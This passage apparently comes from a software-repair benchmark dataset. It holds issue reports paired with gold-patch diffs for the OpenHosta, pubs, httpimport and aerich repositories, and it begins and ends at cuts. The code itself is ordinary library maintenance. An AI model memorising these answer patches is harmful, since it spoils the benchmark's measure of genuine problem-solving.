+
+ try:
+ with open(hosta_path, 'r') as file:
+ if file_extension == '.json':
+ data = json.load(file)
+ if isinstance(data, list):
+ for item in data:
+ if item not in cached_data['ho_data']:
+ cached_data['ho_data'].append(item)
+ else:
+ if data not in cached_data['ho_data']:
+ cached_data['ho_data'].append(data)
+ elif file_extension == '.jsonl':
+ for line in file:
+ item = json.loads(line)
+ if item not in cached_data['ho_data']:
+ cached_data['ho_data'].append(item)
+ elif file_extension == '.csv':
+ reader = csv.DictReader(file)
+ for row in reader:
+ if row not in cached_data['ho_data']:
+ cached_data['ho_data'].append(row)
+ with open(path_name, "wb") as f:
+ pickle.dump(cached_data, f)
+ except (IOError, json.JSONDecodeError) as e:
+ raise ValueError(f"Error loading data from {hosta_path}") from e
+ return cached_data
+
+
+def _extend_scope() -> Callable:
+ func: Callable = None
+ current = None
+ step = None
+ caller = None
+
+ current = inspect.currentframe()
+ if current is None:
+ raise FrameError("Current frame is None")
+ step = current.f_back
+ if step is None:
+ raise FrameError("Caller[lvl1] frame is None")
+ caller = step.f_back
+ if caller is None:
+ raise FrameError("Caller[lvl2] frame is None")
+
+ caller_name = caller.f_code.co_name
+ caller_code = caller.f_code
+ l_caller = caller
+
+ if "self" in caller.f_locals:
+ obj = caller.f_locals["self"]
+ func = getattr(obj, caller_name, None)
+ if func:
+ func = inspect.unwrap(func)
else:
- raise ValueError(f"Please provide hosta_func for specifying the function")
+ while func is None and l_caller.f_back is not None:
+ for obj in l_caller.f_back.f_locals.values():
+ found = False
+ try:
+ if hasattr(obj, "__code__"):
+ found = True
+ except:
+ continue
+ if found and obj.__code__ == caller_code:
+ func = obj
+ break
+ if func is None:
+ l_caller = l_caller.f_back
+ if func is None:
+ func = caller.f_globals.get(caller_name)
+ if func:
+ func = inspect.unwrap(func)
+
+ if func is None or not callable(func):
+ raise FrameError("The emulated function cannot be found.")
- if hosta_path is None:
- raise ValueError(
- f"Please provide hosta_path for specifying the path to load the cache"
- )
+ return func, caller
- list_of_examples = []
- try:
- with open(hosta_path, "r") as file:
- for line in file:
- hosta_example = json.loads(line.strip())
- list_of_examples.append(hosta_example)
- except Exception:
- raise IOError("Please provide a Json or a JsonL file only.")
+EXAMPLE_DOC = """
+A utility function that performs runtime type validation on a given function's arguments and output.
- cache_id = "ho_example"
- value = list_of_examples
- cache = Hostacache(func, cache_id, value)
- cache()
+Parameters:
+ *args:
+ Positional arguments to validate against the input types of the provided function (hosta_func).
+ **kwargs:
+ Keyword arguments (passed by name) to validate against the input types of the provided function.
+ hosta_func (function, optional but recommended):
+ The function whose signature will be used for input/output type validation.
+ hosta_out (object):
+ The expected output of hosta_func, to be validated against the return type annotation.
+
+Raises:
+ ValueError:
+ If the number of arguments provided does not match the expected number as per the function's signature.
+ TypeError:
+ If the type of any argument or output does not match the expected type.
+"""
\ No newline at end of file
diff --git a/src/OpenHosta/exec.py b/src/OpenHosta/exec.py
index c057a83..bbb4bf3 100644
--- a/src/OpenHosta/exec.py
+++ b/src/OpenHosta/exec.py
@@ -8,8 +8,11 @@
from pydantic import BaseModel, create_model
import copy
+import functools
+
from .enhancer import enhance
from .errors import FrameError
+from .predict import continue_train, to_emulate, retrain
CACHE_DIR = "__hostacache__"
@@ -30,11 +33,15 @@ def __call__(self, *args, **kwargs):
"return_type": "",
"return_caller": "",
"function_call": "",
+ "function_args": {},
"function_locals": {},
"ho_example": [],
"ho_example_id": 0,
+ "ho_example_links": [],
"ho_cothougt": [],
"ho_cothougt_id": 0,
+ "ho_data": [],
+ "ho_data_id" : 0
}
func_obj, caller = self._extend_scope()
func_name = func_obj.__name__
@@ -51,20 +58,21 @@ def __call__(self, *args, **kwargs):
cached_data["ho_cothougt_id"],
)
+ self._attach_attributs(func_obj, func_prot)
if function_hash == cached_data["hash_function"]:
- cached_data["function_call"], cached_data["function_locals"] = (
+ cached_data["function_call"], cached_data["function_locals"], cached_data["function_args"] = (
self._get_functionCall(func_obj, caller)
)
- self._attach_attributs(func_obj, func_prot)
return self.exec(cached_data, func_obj, *args, **kwargs)
hosta_args = self._get_argsFunction(func_obj)
with open(path_name, "wb") as f:
res = pickle.dump(hosta_args, f)
# TODO : fix the function locals because he didn't load in the cache
- hosta_args["function_call"], hosta_args["function_locals"] = (
+ hosta_args["function_call"], hosta_args["function_locals"], hosta_args["function_args"] = (
self._get_functionCall(func_obj, caller)
)
+ self._attach_attributs(func_obj, hosta_args["function_def"])
return self.exec(hosta_args, func_obj, *args, **kwargs)
def _get_hashFunction(self, func_def: str, nb_example: int, nb_thought: int) -> str:
@@ -82,7 +90,6 @@ def _get_argsFunction(self, func_obj):
self.infos_cache["ho_example_id"],
self.infos_cache["ho_cothougt_id"],
)
- self._attach_attributs(func_obj, func_prot)
return self.infos_cache
def _extend_scope(self) -> Callable:
@@ -189,7 +196,7 @@ def _get_functionCall(self, func: Callable, caller) -> str:
)
call = f"{func.__name__}({args_str})"
- return call, locals
+ return call, locals, values_args
def _inspect_returnType(self, func: Callable) -> str:
sig = inspect.signature(func)
@@ -245,7 +252,21 @@ def _get_functionReturnType(self, func: Callable) -> Dict[str, Any]:
return return_type, return_caller
- def _attach_attributs(self, func: Callable, prototype: str):
+ def _attach_attributs(self, func: Callable, prototype: str)->None:
+ """
+ Attach additional attributes to a function.
+
+ Args:
+ func (Callable): The target function to which the attributes are attached.
+ prototype (str): A string representing the prototype (used as an example).
+
+ Returns:
+ Callable: The target function wrapped with the attached attributes.
+ """
if "bound method" not in str(func):
setattr(func, "__suggest__", enhance)
- setattr(func, "_prot", prototype)
+ setattr(func, "_prot", prototype)
+ setattr(func, "continue_train", functools.partial(continue_train, func_obj=func))
+ setattr(func, "retrain", functools.partial(retrain, func_obj=func))
+ setattr(func, "emulate", functools.partial(to_emulate, func_obj=func))
+
diff --git a/src/OpenHosta/model.py b/src/OpenHosta/model.py
new file mode 100644
index 0000000..f49acde
--- /dev/null
+++ b/src/OpenHosta/model.py
@@ -0,0 +1,102 @@
+import torch
+import torch.nn as nn
+import torch.nn.functional as F
+import time
+import json
+
+class CustomLinearModel(nn.Module):
+
+ def __init__(self, config, hidden_dir):
+ super().__init__()
+ self.hidden_dir = hidden_dir
+ self.path = hidden_dir+"/config.json"
+ if config == None:
+ try:
+ with open(self.path, 'r') as f:
+ self.config = json.load(f)
+ except Exception as e:
+ raise Exception("Config file not found please check the path : ", self.path)
+ else:
+ self.config = config
+
+ self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
+ self.create_model(self.config)
+
+ self.loss = nn.SmoothL1Loss()
+ self.optimizer = torch.optim.AdamW(self.parameters(), lr=0.001)
+ self.to(self.device)
+
+ def create_model(self, config):
+
+ input_size = config["input_size"]
+ output_size = config["output_size"]
+
+ hidden_sizes = []
+ for key in config:
+ if key.startswith("hidden_size_"):
+ layer_num_str = key.split("_")[-1]
+ if layer_num_str.isdigit():
+ layer_num = int(layer_num_str)
+ hidden_sizes.append((layer_num, config[key]))
+ hidden_sizes.sort(key=lambda x: x[0])
+
+ layer_sizes = [input_size] + [size for _, size in hidden_sizes] + [output_size]
+
+ for idx in range(len(layer_sizes) - 1):
+ in_features = layer_sizes[idx]
+ out_features = layer_sizes[idx + 1]
+ self.add_module(f"fc{idx + 1}", nn.Linear(in_features, out_features, dtype=torch.float32))
+
+ return
+
+ def forward(self, x):
+ x = x.to(self.device)
+ num_layers = len(self.config) - 4
+ for idx in range(1, num_layers):
+ layer = getattr(self, f"fc{idx}")
+ x = F.relu(layer(x))
+
+ layer = getattr(self, f"fc{num_layers}")
+ x = layer(x)
+ return x
+
+
+ def train(self, train, val, epochs, path, verbose=False, get_loss=None, continue_training=False):
+ get_loss=0.0 if get_loss is None else get_loss
+
+ if continue_training:
+ try:
+ self.load_state_dict(torch.load(path+"/model.pth", weights_only=True))
+ if verbose:
+ print(f"\033[93mModel loaded from {path}/model.pth\033[0m")
+ except Exception as e:
+ raise Exception(f"Model weight not found at {path}/model.pth")
+
+ total_start = time.time()
+
+ for epoch in range(epochs):
+ epoch_start = time.time()
+ for X_train, y_train in train:
+ X_train, y_train = X_train.to(self.device), y_train.to(self.device)
+ self.optimizer.zero_grad()
+ output = self.forward(X_train)
+
+ loss = self.loss(output, y_train)
+ loss.backward()
+ self.optimizer.step()
+ epoch_end = time.time()
+ epoch_time = epoch_end - epoch_start
+ if verbose:
+ print(f"\033[94m{epoch}/{epochs} -> Loss: {loss.item()} in {epoch_time} sec\033[0m", flush=True)
+
+ if loss.item() < get_loss:
+ if verbose:
+ print(f"\033[93mLoss target achieved at epoch {epoch} with loss {loss.item()} in {epoch_time} sec\033[0m", flush=True)
+ break
+
+ total_end = time.time()
+ total_time = total_end - total_start
+ if verbose:
+ print(f"\033[92mTraining complete : Loss: {loss.item()} in a total of {total_time} sec\033[0m", flush=True)
+
+ torch.save(self.state_dict(), path+"/model.pth")
diff --git a/src/OpenHosta/predict.py b/src/OpenHosta/predict.py
new file mode 100644
index 0000000..c468a02
--- /dev/null
+++ b/src/OpenHosta/predict.py
@@ -0,0 +1,195 @@
+import os
+
+import pickle
+from .cache import Hostacache
+from .builder import Builder
+from .datapreparator import Datapreparator
+from .example import type_verificator
+from .emulate import _exec_emulate
+
+from typing import Any
+import inspect
+
+CACHE_DIR = "__hostacache__"
+os.makedirs(CACHE_DIR, exist_ok=True)
+
+def _exec_predict(
+ _function_infos: dict = None,
+ _function_obj: object = None,
+
+ encoder = None,
+ decoder = None,
+ verbose: bool = False,
+ prediction: list = [],
+ complexity: int = None,
+ config: dict = None,
+ optimizer: str = None,
+ loss: str = None,
+ epochs: int = None,
+ get_loss: float = 0.0,
+ batch_size: int = None,
+ force_train: bool = False,
+ norm_max: float = None,
+ norm_min: float = None,
+ continue_training: bool = False,
+ normalization: bool = False
+):
+ hidden_dir = os.path.join(CACHE_DIR, f".model_{_function_obj.__name__}_{_function_infos['hash_function']}")
+ os.makedirs(hidden_dir, exist_ok=True)
+
+ config_path = os.path.join(hidden_dir, "config.json")
+ weight_path = os.path.join(hidden_dir, "model.pth")
+ normalisation_path = os.path.join(hidden_dir, "normalisation.json")
+
+ preparator = Datapreparator(norm_max, norm_min, encoder, decoder)
+ builder = Builder(hidden_dir)
+
+ if not os.path.exists(config_path) or not os.path.exists(weight_path) or force_train==True:
+
+ train, val = preparator.prepare(_function_infos, prediction)
+
+ if normalization:
+ train, val = preparator.normalize_dataset(train,val)
+ preparator.save_normalization_params(normalisation_path)
+ len_input = len(train[0][0])
+ len_output = len(train[0][1])
+ builder.build(len_input, len_output, complexity, config, optimizer, loss)
+ if batch_size is None:
+ batch_size = int(0.05 * len(train)) if 0.05 * len(train) > 1 else len(train) # 5% of the dataset or len(train) if len(train)
+ else:
+ batch_size = batch_size
+ save_len = len(train)
+ train, eval = preparator.split(train, val, batch_size)
+ epochs = int(2*save_len / batch_size if batch_size != save_len else 2*save_len) if epochs is None else epochs
+ assert epochs > 0, "epochs must be greater than 0 now it's {epochs}"
+ builder.trains(config, train, eval, epochs=epochs, verbose=verbose, get_loss=get_loss, continue_training=continue_training)
+ else:
+ if verbose:
+ print("\033[93mModel already trained, skipping training\033[0m")
+ if normalization:
+ preparator.load_normalization_params(normalisation_path)
+ if _function_infos["function_args"] != {}:
+ inference = preparator.prepare_input(_function_infos["function_args"])
+ if normalization:
+ inference = preparator.normalize_inference(inference)
+ torch_inference = preparator.convert(inference)
+
+ prediction = builder.load_inference(config_path, weight_path, torch_inference)
+ if normalization:
+ prediction_denormalize = preparator.denormalize_prediction(prediction)
+ result = float(prediction_denormalize[0])
+ else:
+ result = float(prediction.detach().cpu().numpy()[0])
+ return result
+
+
+def continue_train(func_obj, epochs=None, get_loss=None, verbose=False):
+ """
+ Continue the training of the model
+ - Reload a pth and add a dataset or not for the model
+ save a new pth after the training decided in the emulate or not or in this function also (diff parameters
+ of training and not architecture)
+ """
+ infos_cache = load_cache(func_obj)
+ return _exec_predict(_function_infos=infos_cache, _function_obj=func_obj, force_train=True ,continue_training=True, epochs=epochs, get_loss=get_loss, verbose=verbose)
+
+
+def get_input_types_from_signature(func_obj):
+ """
+ Extract input type from function signature
+ """
+ signature = inspect.signature(func_obj)
+ input_type = {}
+ for name, param in signature.parameters.items():
+ if param.annotation != inspect.Parameter.empty:
+ input_type[name] = param.annotation
+ else:
+ input_type[name] = Any
+ return input_type
+
+
+def emulate_verificator(args, kwargs, input_type, func, example_dict):
+ """
+ Vérifie les types des arguments positionnels et nommés lors de l'appel à emulate.
+ Met à jour example_dict avec les valeurs validées.
+ """
+ param_names = list(input_type.keys())
+
+ total_args_provided = len(args) + len(kwargs)
+ total_args_expected = len(param_names)
+
+ if total_args_provided != total_args_expected:
+ raise ValueError(
+ f"Incorrect number of arguments for function '{func.__name__}', "
+ f"expected {total_args_expected}, got {total_args_provided}."
+ )
+
+ for i, arg in enumerate(args):
+ param_name = param_names[i]
+ expected_type = input_type[param_name]
+
+ if not isinstance(arg, expected_type):
+ raise TypeError(
+ f"Positional argument '{param_name}'={arg} does not match the expected type "
+ f"{expected_type} in function '{func.__name__}'."
+ )
+ example_dict[param_name] = arg
+
+ for key, value in kwargs.items():
+ if key not in input_type:
+ raise ValueError(
+ f"Unexpected named argument '{key}' for function '{func.__name__}'."
+ )
+ expected_type = input_type[key]
+
+ if not isinstance(value, expected_type):
+ raise TypeError(
+ f"Named argument '{key}'={value} does not match the expected type "
+ f"{expected_type} in function '{func.__name__}'."
+ )
+ example_dict[key] = value
+
+
+def to_emulate(*args, func_obj, model=None, l_creativity=None, l_diversity=None, **kwargs):
+ """
+ Emulate the function with the given arguments and keyword arguments.
+ """
+ infos_cache = load_cache(func_obj)
+ input_type = get_input_types_from_signature(func_obj)
+
+ example_dict = {}
+
+ emulate_verificator(args=args, kwargs=kwargs, input_type=input_type, func=func_obj, example_dict=example_dict)
+ infos_cache["function_args"] = example_dict
+ infos_cache["function_call"] = f"{func_obj.__name__}({', '.join([f'{k}={v}' for k, v in example_dict.items()])})"
+ return _exec_emulate(_infos=infos_cache, _obj=func_obj, model=model, l_creativity=l_creativity, l_diversity=l_diversity)
+
+
+def load_cache(func_obj):
+ func_name = func_obj.__name__
+ path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
+
+ if os.path.exists(path_name):
+ with open(path_name, "rb") as f:
+ cached_data = pickle.load(f)
+ return cached_data
+ else:
+ raise ValueError(f"Cache not found for function '{func_name}'.")
+
+
+def retrain(func_obj=None, force_train=True, epochs=None, get_loss=None, verbose=False):
+
+ infos_cache = load_cache(func_obj)
+ return _exec_predict(_function_infos=infos_cache, _function_obj=func_obj, force_train=force_train, epochs=epochs, get_loss=get_loss, verbose=verbose)
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/src/OpenHosta/requirements.txt b/src/OpenHosta/requirements.txt
new file mode 100644
index 0000000..32c71f3
--- /dev/null
+++ b/src/OpenHosta/requirements.txt
@@ -0,0 +1,5 @@
+Flask==3.0.3
+PyYAML==6.0.2
+pydantic==2.8.2
+Jinja2==3.1.4
+pyreadline3==3.4.1
\ No newline at end of file
diff --git a/src/OpenHosta/thought.py b/src/OpenHosta/thought.py
index 7547f73..ef059de 100644
--- a/src/OpenHosta/thought.py
+++ b/src/OpenHosta/thought.py
@@ -73,3 +73,4 @@ def inner_func(*args, **kwargs):
return result
return inner_func
+
\ No newline at end of file
diff --git a/src/OpenHosta/trainset.py b/src/OpenHosta/trainset.py
new file mode 100644
index 0000000..c2b1cfc
--- /dev/null
+++ b/src/OpenHosta/trainset.py
@@ -0,0 +1,59 @@
+import inspect
+
+from .cache import Hostacache
+from .example import type_verificator
+from .config import DefaultManager
+from .predict import load_cache
+
+l_default = DefaultManager.get_default_model()
+
+class TrainingSet():
+ def __init__(self, func : callable):
+ assert callable(func), "Please provide an hosta-injected function"
+ self.func = func
+ self.infos_cache = None
+
+ def visualize(self):
+ """
+ function for visualize the training set idk how for now
+ maybe let the hostashpère do it
+ """
+ hosta_cache = load_cache(self.func)
+ print("ho_example:")
+ for i in range(len(hosta_cache["ho_example"])):
+ print(hosta_cache["ho_example"][i])
+ print("ho_data:")
+ for i in range(len(hosta_cache["ho_data"])):
+ print(hosta_cache["ho_data"][i])
+ return [hosta_cache["ho_example"], hosta_cache["ho_data"]]
+
+ def add(self, *args, hosta_out=None,**kwargs):
+ """
+ function for add an example to the training set
+ """
+ input_type = {}
+ output_type = {}
+ data_dict = {}
+ hosta_func = self.func
+
+ if hosta_out is None:
+ raise ValueError("Please provide hosta_out for output.")
+ if hosta_func is None:
+ raise ValueError("Please provide hosta_func for specifying the function")
+ elif callable(hosta_func):
+ func = hosta_func
+ else:
+ raise ValueError("Please provide hosta_func for specifying the function")
+
+ try:
+ sig = inspect.signature(func)
+ for param in sig.parameters.values():
+ input_type[param.name] = param.annotation
+ output_type["hosta_out"] = sig.return_annotation
+ except:
+ raise ValueError("Function does not have a signature")
+
+ type_verificator(args, kwargs, input_type, output_type, hosta_out, func, data_dict)
+ cache_id = "ho_data"
+ cache = Hostacache(func, cache_id, data_dict)
+ cache.create_hosta_cache()
| Merge v1.1 to v1.2beta 2
| 2024-10-14T08:32:09 | 0.0 | [] | [] |
|||
pubs/pubs | pubs__pubs-260 | 96cce2cab5b4f3016bbcf7b08c2bd4fd8108d3e1 | diff --git a/.travis.yml b/.travis.yml
deleted file mode 100644
index a03b5d2d..00000000
--- a/.travis.yml
+++ /dev/null
@@ -1,89 +0,0 @@
-# list of environments to test
-matrix:
- include:
-
- # Full tests (with online API)
- - os: linux
- language: python
- python: 3.9
- dist: xenial
- sudo: true
- env:
- - TO_TEST=TEST_FULL
- - os: osx
- language: generic
- python: ">=3.6"
- env:
- - TO_TEST=TEST_FULL
- before_install:
- - brew outdated python3 || brew install python3 || brew upgrade python3
- - python3 -m venv env
- - source env/bin/activate
-
- # Mock tests (with mock API)
- - os: linux
- language: python
- python: 3.6
- env:
- - TO_TEST=TEST_MOCK
- - os: linux
- language: python
- dist: xenial
- python: 3.7
- sudo: true
- env:
- - TO_TEST=TEST_MOCK
- - os: linux
- language: python
- dist: xenial
- python: 3.8
- sudo: true
- env:
- - TO_TEST=TEST_MOCK
- - os: linux
- language: python
- dist: xenial
- python: 3.9
- sudo: true
- env:
- - TO_TEST=TEST_MOCK
-
-
- # Install tests
- - os: linux
- language: python
- python: 2.7
- env:
- - TO_TEST=INSTALL
- if: type = cron
- - os: linux
- language: python
- dist: xenial
- sudo: true
- python: 3.9
- env:
- - TO_TEST=INSTALL
- if: type = cron
- - os: osx
- language: generic
- python: 2.7
- env:
- - TO_TEST=INSTALL
- if: type = cron
- - os: osx
- language: generic
- python: ">=3.6"
- env:
- - TO_TEST=INSTALL
- if: type = cron
-
- allow_failures:
- - python: 2.7
-
-# command to run tests
-script:
- - python --version
- - if [ "$TO_TEST" = "TEST_MOCK" ] ||
- [ "$TO_TEST" = "TEST_FULL" ]; then PUBS_TESTS_MODE=MOCK python setup.py test; fi
- - if [ "$TO_TEST" = "TEST_FULL" ]; then PUBS_TESTS_MODE=COLLECT python setup.py test; fi
- - if [ "$TO_TEST" = "INSTALL" ]; then pip install -U pip && pip install pubs && pubs --help && pip uninstall -y pubs; fi
diff --git a/changelog.md b/changelog.md
index 0a251163..ca05610c 100644
--- a/changelog.md
+++ b/changelog.md
@@ -7,6 +7,7 @@
### Implemented enhancements
+- Migration from Travis CI to Github actions ([#260](https://github.com/pubs/pubs/pull/260))
- Allow passing named arguments to custom commands ([#241](https://github.com/pubs/pubs/pull/241) by [jkulhanek](https://github.com/jkulhanek))
- Added support for non-standard bibtex types, e.g. @collection, @software, etc. ([#226](https://github.com/pubs/pubs/pull/226))
- The number of displayed authors in listings is now configurable, as the `max_authors` value in the `main` section of the configuration. ([#225](https://github.com/pubs/pubs/pull/225))
@@ -15,6 +16,7 @@
### Fixed bugs
+- Fixed collision when entry uses `type` field ([#252](https://github.com/pubs/pubs/pull/252))
- Note on comma in alias descriptions ([#240](https://github.com/pubs/pubs/pull/240) [StanczakDominik](https://github.com/StanczakDominik))
- Note path correctly expand user '~' ([#250](https://github.com/pubs/pubs/pull/250))
- Tests don't run on python 2.7 or <=3.4. They may still work, but support will not be tested and will eventually be dropped. ([#223](https://github.com/pubs/pubs/pull/223))
diff --git a/dev_requirements.txt b/dev_requirements.txt
index b9879c5a..0b107fba 100644
--- a/dev_requirements.txt
+++ b/dev_requirements.txt
@@ -20,8 +20,6 @@ six
# those are the additional packages required to run the tests
pyfakefs
certifi
-# FIXME: remove strict version when https://github.com/datadriventests/ddt/issues/83 is fixed.
-# (also remove in setup.py)
-ddt==1.3.1
+ddt>=1.4.1
mock
pytest
diff --git a/pubs/plugs/git/git.py b/pubs/plugs/git/git.py
index 5be92218..3bff3d6a 100644
--- a/pubs/plugs/git/git.py
+++ b/pubs/plugs/git/git.py
@@ -16,11 +16,13 @@
class GitPlugin(PapersPlugin):
- """The git plugin creates a git repository in the pubs directory and commit the changes
- to the pubs repository everytime a paper is modified.
+ """Make the pubs repository also a git repository.
- It also add the `pubs git` subcommand, so git commands can be executed in the git repository
- from the command line.
+ The git plugin creates a git repository in the pubs directory
+ and commit the changes to the pubs repository.
+
+ It also add the `pubs git` subcommand, so git commands can be executed
+ in the git repository from the command line.
"""
name = 'git'
@@ -28,10 +30,10 @@ class GitPlugin(PapersPlugin):
def __init__(self, conf, ui):
self.ui = ui
- self.pubsdir = os.path.expanduser(conf['main']['pubsdir'])
- self.manual = conf['plugins'].get('git', {}).get('manual', False)
+ self.pubsdir = os.path.expanduser(conf['main']['pubsdir'])
+ self.manual = conf['plugins'].get('git', {}).get('manual', False)
self.force_color = conf['plugins'].get('git', {}).get('force_color', True)
- self.quiet = conf['plugins'].get('git', {}).get('quiet', True)
+ self.quiet = conf['plugins'].get('git', {}).get('quiet', True)
self.list_of_changes = []
self._gitinit()
@@ -72,17 +74,18 @@ def shell(self, cmd, input_stdin=None, command=False):
"""
colorize = ' -c color.ui=always' if self.force_color else ''
git_cmd = 'git -C {}{} {}'.format(self.pubsdir, colorize, cmd)
- #print(git_cmd)
p = Popen(git_cmd, stdin=PIPE, stdout=PIPE, stderr=STDOUT, shell=True)
output, err = p.communicate(input_stdin)
p.wait()
if p.returncode != 0:
- raise RuntimeError('The git plugin encountered an error when running the git command:\n' +
- '{}\n\nReturned output:\n{}\n'.format(git_cmd, output.decode('utf-8')) +
- 'If needed, you may fix the state of the {} git repository '.format(self.pubsdir) +
- 'manually.\nIf relevant, you may submit a bug report at ' +
- 'https://github.com/pubs/pubs/issues')
+ raise RuntimeError((
+ 'The git plugin encountered an error when running the git command:\n'
+ '{}\n\n'
+ 'Returned output:\n{}\n'
+ 'If needed, you may fix the state of the {} git repository manually.\n'
+ 'If relevant, you may submit a bug report at https://github.com/pubs/pubs/issues'
+ ).format(git_cmd, output.decode('utf-8'), self.pubsdir))
elif command:
self.ui.message(output.decode('utf-8'), end='')
elif not self.quiet:
@@ -97,10 +100,11 @@ def paper_change_event(event):
git = GitPlugin.get_instance()
if not git.manual:
event_desc = event.description
- for a, b in [('\\','\\\\'), ('"','\\"'), ('$','\\$'), ('`','\\`')]:
+ for a, b in [('\\', '\\\\'), ('"', '\\"'), ('$', '\\$'), ('`', '\\`')]:
event_desc = event_desc.replace(a, b)
git.list_of_changes.append(event_desc)
+
@PostCommandEvent.listen()
def git_commit(event):
if GitPlugin.is_loaded():
diff --git a/setup.py b/setup.py
index f5e45d28..011ad683 100644
--- a/setup.py
+++ b/setup.py
@@ -60,7 +60,7 @@ def pubs_test_suite():
],
test_suite='tests',
- tests_require=['pyfakefs>=3.4', 'mock', 'ddt==1.3.1', 'certifi', 'pytest'],
+ tests_require=['pyfakefs>=3.4', 'mock', 'ddt>=1.4.1', 'certifi', 'pytest'],
# in order to avoid 'zipimport.ZipImportError: bad local file header'
zip_safe=False,
| Fix continuous integration
Whether by fixing Travis or switching to Github Actions.
| 2021-01-26T07:29:26 | 0.0 | [] | [] |
|||
operatorequals/httpimport | operatorequals__httpimport-41 | 2afc661025060ce8d8ed1a6f6cbde99e2304fedf | diff --git a/httpimport.py b/httpimport.py
index 316bfe2..b59d9a5 100644
--- a/httpimport.py
+++ b/httpimport.py
@@ -117,17 +117,19 @@ def __init__(self, base_url, zip_pwd=None):
def _mod_to_filepaths(self, fullname, compiled=False):
suffix = '.pyc' if compiled else '.py'
- # get the python module name
- py_filename = fullname.replace(".", os.sep) + suffix
- # get the filename if it is a package/subpackage
- py_package = fullname.replace(
- ".", os.sep, fullname.count(".") - 1) + "/__init__" + suffix
-
if self.is_archive:
+ # get the python module name
+ py_filename = fullname.replace(".", os.sep) + suffix
+ # get the filename if it is a package/subpackage
+ py_package = fullname.replace(
+ ".", os.sep, fullname.count(".") - 1) + "/__init__" + suffix
return {'module': py_filename, 'package': py_package}
else:
# if self.in_progress:
- # py_package = fullname.replace(".", '/') + "/__init__" + suffix
+ # get the python module name
+ py_filename = fullname.replace(".", '/') + suffix
+ # get the filename if it is a package/subpackage
+ py_package = fullname.replace(".", '/') + "/__init__" + suffix
return {
'module': self.base_url + py_filename,
'package': self.base_url + py_package
@@ -221,8 +223,16 @@ def load_module(self, name):
if module_type == 'package':
mod.__package__ = name
else:
- mod.__package__ = name.split('.')[0]
-
+ #check if this could be a nested package
+ if len(name.split('.')[:-1]) > 1:
+ #recursively find the package
+ pkg_name = '.'.join(name.split('.')[:-1])
+ while sys.modules[pkg_name].__package__ != pkg_name:
+ pkg_name = '.'.join(pkg_name.split('.')[:-1])
+ mod.__package__ = pkg_name
+ #if this could not be nested, we just use it's own name
+ else:
+ mod.__package__ = name.split('.')[0]
try:
mod.__path__ = ['/'.join(mod.__file__.split('/')[:-1]) + '/']
except:
| Relative Path Importing/incorrect import package
This is heavily related to #28, though I believe they were half way incorrect when they said importing a second time would result in a working execution. Based on what I've seen, when the import fails it ends up in a half-way state where the import isn't shown in globals() or dir(), but can be seen from sys.modules(). This breaks some stuff and likely won't result in an actually working function/module.
Took some time to dig into this issue and it's not actually an issue with relative path imports, that's more of a symptom, the actual issue stems from the fact that nested modules don't get the proper value set for their `__package__` attribute.
This is caused by line 224 in the current code where, no matter what the path is, it splits it and grabs the first item in the index and uses that as the package. So a for example:
```
Package1_
|_Module1
|_Package2_
|_Module2
|_Module3
```
If you have the following file structure and Module3 contains 'import .Module2' that will fail, because python uses the `__package__` attribute to determine relative paths and all of these modules have Package1 as their `__package__`.
| 2022-12-18T07:22:51 | 0.0 | [] | [] |
|||
tortoise/aerich | tortoise__aerich-385 | 56eff1b22f2143c646dd4a2144493b97ef0da211 | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 7c7f91d..f518021 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,7 @@
### [0.8.1](Unreleased)
#### Fixed
+- Setting null=false on m2m field causes migration to fail. (#334)
- Fix NonExistentKey when running `aerich init` without `[tool]` section in config file. (#284)
- Fix configuration file reading error when containing Chinese characters. (#286)
- sqlite: failed to create/drop index. (#302)
diff --git a/aerich/migrate.py b/aerich/migrate.py
index ed1605c..5429ac8 100644
--- a/aerich/migrate.py
+++ b/aerich/migrate.py
@@ -275,8 +275,8 @@ def diff_models(
length = len(old_m2m_fields)
field_index = {f["name"]: i for i, f in enumerate(new_m2m_fields)}
new_m2m_fields.sort(key=lambda field: field_index.get(field["name"], length))
- for action, _, change in diff(old_m2m_fields, new_m2m_fields):
- if change[0][0] == "db_constraint":
+ for action, option, change in diff(old_m2m_fields, new_m2m_fields):
+ if (option and option[-1] == "nullable") or change[0][0] == "db_constraint":
continue
new_value = change[0][1]
if isinstance(new_value, str):
| Setting null = false on m2m fields causes migration to fail
I have a m2m field as follows:
```py
class Contact(RootModel):
categories = fields.ManyToManyField('core.ContactCategory',
related_name='contacts', through='fkcontactcategory',
description="Categories", on_delete=fields.SET_NULL)
```
I set null=False on the field.
categories = fields.ManyToManyField('core.ContactCategory', related_name='contacts', null=False, through='fkcontactcategory', description="Categories", on_delete=fields.SET_NULL)
When performing the migration using command.migrate(app_name) I run into an error:
**'bool' object is not subscriptable**
Any help would be appreciated.
| 2024-12-11T13:02:22 | 0.0 | [] | [] |
|||
tortoise/aerich | tortoise__aerich-381 | 3d840395f17211bb0591174aed2b3c9c310ed08f | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 1ff66ca..7c7f91d 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,7 @@
### [0.8.1](Unreleased)
#### Fixed
+- Fix NonExistentKey when running `aerich init` without `[tool]` section in config file. (#284)
- Fix configuration file reading error when containing Chinese characters. (#286)
- sqlite: failed to create/drop index. (#302)
- PostgreSQL: Cannot drop constraint after deleting or rename FK on a model. (#378)
diff --git a/aerich/cli.py b/aerich/cli.py
index 25aeb8c..b5d446d 100644
--- a/aerich/cli.py
+++ b/aerich/cli.py
@@ -190,7 +190,10 @@ async def init(ctx: Context, tortoise_orm, location, src_folder) -> None:
table["tortoise_orm"] = tortoise_orm
table["location"] = location
table["src_folder"] = src_folder
- doc["tool"]["aerich"] = table
+ try:
+ doc["tool"]["aerich"] = table
+ except KeyError:
+ doc["tool"] = {"aerich": table}
config_path.write_text(tomlkit.dumps(doc))
| NonExistentKey when running `aerich init`
```
# aerich init -t project.settings.DATABASE
...
File "/usr/local/lib/python3.11/site-packages/aerich/cli.py", line 205, in init
doc["tool"]["aerich"] = table
~~~^^^^^^^^
File "/usr/local/lib/python3.11/site-packages/tomlkit/container.py", line 650, in __getitem__
raise NonExistentKey(key)
tomlkit.exceptions.NonExistentKey: 'Key "tool" does not exist.'
```
My `pyproject.toml`:
```toml
[project]
name = "project"
classifiers = ["Private :: Do Not Upload"]
version = "0"
dependencies = [
